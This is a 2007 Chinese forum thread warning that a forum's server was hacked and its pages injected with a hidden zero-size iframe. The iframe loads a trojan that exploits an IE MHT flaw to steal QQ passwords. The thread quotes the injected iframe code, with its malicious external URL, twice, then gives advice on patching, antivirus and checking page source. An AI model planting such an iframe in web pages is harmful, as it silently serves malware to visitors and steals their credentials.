发现网页挂病毒

lshclub

Exploit.html.mht.bb

lshclub

我仔细看过了，是论坛所在服务器被人利用漏洞攻击了，篡改了cbish的网页，加入了恶意的框架网页代码，当大家访问cbish论坛的时候，这个框架网页会被自动加载，并自动下载木马程序，这个木马主要作用是盗取用户的私人信息，比如QQ密码等！并自动下载恶意代码到用户的计算机上……

QUOTE:

<iframe src="http://bbs.mxgfz.com.cn/inc/icyfox.htmhttp://bbs.mxgfz.com.cn/inc/icyfox.htm" width="0" height="0" frameborder="0"></iframe>
</html><iframe src="http://bbs.mxgfz.com.cn/inc/icyfox.htmhttp://bbs.mxgfz.com.cn/inc/icyfox.htm" width="0" height="0" frameborder="0"></iframe>

警告：上面的网页别去访问，是木马病毒！
装了防病毒软件的会被杀毒软件阻断，没有安装防病毒软件的读者请按照如下办法解决：

关于exploit.html.mht.p病毒的解释
IE浏览器安全漏洞。
　　据位于伦敦的安全公司ScanSafe发表的数据显示，今年第2季度微软的IE浏览器中的一个安全漏洞是被黑客用来实施攻击的最多的一个安全漏洞。
　　这家安全公司称，排名第一的安全漏洞是“Exploit.HTML.Mht”。黑客利用微软IE浏览器中的这个安全漏洞就可以在用户计算机上下载和安装恶意程序。利用这个安全漏洞向机构实施攻击的次数比利用其它安全漏洞实施攻击的次数多一倍。
　　我知道目前瑞星16.56.10 版以上可杀此病毒。江民的也可以杀掉的。
建议：安装微软最新的IE漏洞补丁，这个病毒只针对微软IE攻击！用杀毒软件杀毒！

一个检查程序文件页面是否被病毒恶意修改的方法是：打开页面后，点击浏览器的〔查看〕菜单，选择〔查看源文件〕，将滚动条拖到最后面，看看最后面是否有如下代码：

QUOTE:

<iframe src="http://bbs.mxgfz.com.cn/inc/icyfox.htmhttp://bbs.mxgfz.com.cn/inc/icyfox.htm" width="0" height="0" frameborder="0"></iframe>
</htmlL><iframe src="http://bbs.mxgfz.com.cn/inc/icyfox.htmhttp://bbs.mxgfz.com.cn/inc/icyfox.htm" width="0" height="0" frameborder="0"></iframe>

lshclub

包括首页在内的所有页面，我用的是江民，别的网站不提示，这个网站从首页到链接页都提示，并自动进入到D盘文件夹，也许不一定是病毒，也许是江民软件比较敏感，关注中。。

[此贴子已经被作者于2007-5-14 11:33:51编辑过]

管理员4

哪个页面??